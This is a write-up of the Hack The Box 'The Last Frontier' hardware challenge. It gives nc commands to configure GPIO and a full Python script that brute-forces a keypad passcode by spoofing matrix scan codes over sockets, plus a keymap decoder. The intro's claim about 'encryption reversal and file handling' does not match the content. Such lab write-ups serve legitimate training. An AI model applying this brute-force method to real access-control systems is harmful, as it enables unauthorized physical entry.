
HackTheBox The Last Frontier Writeup

Explore the basics of cybersecurity in The Last Frontier Challenge on Hack The Box. This hard-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

https://app.hackthebox.com/challenges/779

Description

You’ve navigated past the main defenses, but there’s one more hurdle: an air-gapped security keypad guarding the lab. We already tried up until the 5000 passcode but we did not manage to open it. We need a faster way to go through all the 4-digit passcodes. Luckily, we’ve exposed some traces on the device’s keypad. Since it’s air-gapped, you’ll need to manually manipulate these pins to mimic the correct keypress sequence. Understanding circuit behavior and exploiting potential vulnerabilities in the hardware is key. Carefully manipulate the pins to unlock the door without triggering any alarms. This is your final step to securing the patch for distribution across the city. To aid in your mission, we have created a remote command and control interface for our custom module connected to the security keypad’s traces. The schematic we’ve drafted based on the device’s keypad configuration should be enough to get you started. (To enter a passcode, send # at the end.)

Exploitation

Connect with nc, set the module ID and configure the GPIO:

#cmd> comm-module-id
#id> 35
#Module ID set to 35
#cmd> GPIO
#set> 1 0
#GPIO-1 set to: 0

Disconnect, then run the following script. It takes the target as <ip:c2_port,keypad_port>: the first port is the nc command-and-control interface, the second is the keypad-trace server that sends the scan commands.

import socket
import time
import sys

# Usage: python script.py <ip:c2_port,keypad_port>
# ports[0] is the C2 (nc) interface, ports[1] is the keypad-trace server.
if len(sys.argv) < 2:
    print(f"Usage: python {sys.argv[0]} <ip:port1,port2>")
    sys.exit(1)

host, ports_str = sys.argv[1].split(':')
ports = [int(port) for port in ports_str.split(',')]

key_presses = '5254#'
current_key_to_send = 0
# Each key is a pair of scan bytes returned in reply to the 'F0' and '0F'
# commands; this is the layout of a 4x4 matrix keypad (123A / 456B / 789C / *0#D).
keymap = {
    '1': ['E0', '0E'], '2': ['D0', '0E'], '3': ['B0', '0E'], 'A': ['70', '0E'],
    '4': ['E0', '0D'], '5': ['D0', '0D'], '6': ['B0', '0D'], 'B': ['70', '0D'],
    '7': ['E0', '0B'], '8': ['D0', '0B'], '9': ['B0', '0B'], 'C': ['70', '0B'],
    '*': ['E0', '07'], '0': ['D0', '07'], '#': ['B0', '07'], 'D': ['70', '07']
}

def interact_with_nc(sock_nc):
    """Query the C2 interface after a passcode was entered; True if the flag appeared."""
    sock_nc.sendall(b"system\n")
    time.sleep(0.5)
    response = sock_nc.recv(4096).decode('utf-8', errors='replace')
    print("Received from NC server:", response)
    return 'HTB{' in response

def simulate_keypad_read(command):
    """Answer the device's scan command for the current key of key_presses."""
    global current_key_to_send
    if command == 'F0':
        key = key_presses[current_key_to_send]
        return keymap[key][0] + '\n'
    elif command == '0F':
        key = key_presses[current_key_to_send]
        current_key_to_send += 1  # the second byte completes this keypress
        return keymap[key][1] + '\n'
    else:
        return 'FF\n'  # no key pressed

def run_client(server_host, server_port):
    global key_presses, current_key_to_send
    sock_nc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock_nc.connect((host, ports[0]))
    print("Connected to NC server.")
    with sock_nc, socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.connect((server_host, server_port))
        print("Connected to server")
        # The description says passcodes up to 5000 were already tried.
        for pin in range(5000, 10000):
            key_presses = f"{pin:04d}#"
            print(key_presses)
            current_key_to_send = 0
            # Keep answering scan commands until every key of the passcode was sent.
            while current_key_to_send < len(key_presses):
                data = sock.recv(1024).decode('utf-8').strip()
                if not data:
                    print("Server closed the connection")
                    return
                print(f"Received from server: {data}")
                if data == 'quit':
                    print("Quit command received")
                    return
                sock.sendall(simulate_keypad_read(data).encode('utf-8'))
            if interact_with_nc(sock_nc):
                print(f"Flag found with passcode {pin:04d}")
                return

if __name__ == "__main__":
    run_client(host, ports[1])

Wait for the PIN to be brute-forced; once the correct passcode has been entered, the C2 response reveals the flag.
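The keymap hard-coded in the script is one instance of a general rule: each of the two scan bytes has exactly one bit cleared, and the position of that bit selects a line of a 4x4 matrix keypad. The following added example (my code, not the writeup's or Hack The Box's) regenerates the table from the standard keypad layout and decodes scan bytes back to keys, rejecting bytes that do not describe a single keypress; reading the first byte as the column and the second as the row is an assumption taken from the table, and the sample trace is constructed.

```python
# Standard 4x4 keypad layout, as implied by the keymap in the script above.
LAYOUT = ["123A", "456B", "789C", "*0#D"]

def column_code(col: int) -> str:
    # First scan byte: high nibble with one bit cleared, leftmost column first (E0, D0, B0, 70).
    return f"{0xF0 & ~(0x10 << col):02X}"

def line_code(line: int) -> str:
    # Second scan byte: low nibble with one bit cleared, top line first (0E, 0D, 0B, 07).
    return f"{0x0F & ~(1 << line):02X}"

def build_keymap() -> dict:
    # Regenerate the {key: [first_byte, second_byte]} table the script hard-codes.
    return {key: [column_code(c), line_code(r)]
            for r, line in enumerate(LAYOUT) for c, key in enumerate(line)}

def single_cleared_bit(nibble: int) -> int:
    # Index (0-3) of the one cleared bit in a 4-bit value. Zero or several cleared
    # bits (no key, or several keys at once) is not a valid single keypress.
    cleared = ~nibble & 0x0F
    if cleared == 0 or cleared & (cleared - 1):
        raise ValueError(f"not a single-key scan nibble: {nibble:X}")
    return cleared.bit_length() - 1

def decode_key(first: str, second: str) -> str:
    # Map a (first_byte, second_byte) pair of hex strings back to the key pressed.
    col = single_cleared_bit(int(first, 16) >> 4)
    row = single_cleared_bit(int(second, 16) & 0x0F)
    return LAYOUT[row][col]

def decode_trace(trace) -> str:
    # Decode (command, response) pairs as the script exchanges them: 'F0' is
    # answered with the first byte, '0F' with the second; anything else is ignored.
    keys, pending = [], None
    for command, response in trace:
        if command == "F0":
            pending = response
        elif command == "0F" and pending is not None:
            keys.append(decode_key(pending, response))
            pending = None
    return "".join(keys)

# Constructed sample exchange for the sequence "5254#", in the shape the script produces.
SAMPLE_TRACE = [("F0", "D0"), ("0F", "0D"), ("F0", "D0"), ("0F", "0E"),
                ("F0", "D0"), ("0F", "0D"), ("F0", "E0"), ("0F", "0D"),
                ("F0", "B0"), ("0F", "07")]

if __name__ == "__main__":
    print(build_keymap())
    print(decode_trace(SAMPLE_TRACE))  # 5254#
```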

Summary

The Last Frontier Challenge on Hack The Box is a hard-level challenge that focuses on advanced hardware manipulation and network communication. Participants configure GPIO settings via the command line, use socket programming to automate network interactions, and conduct a brute-force attack to decode a PIN. This challenge effectively combines hardware control with practical cybersecurity techniques.

This post is licensed under CC BY 4.0 by the author.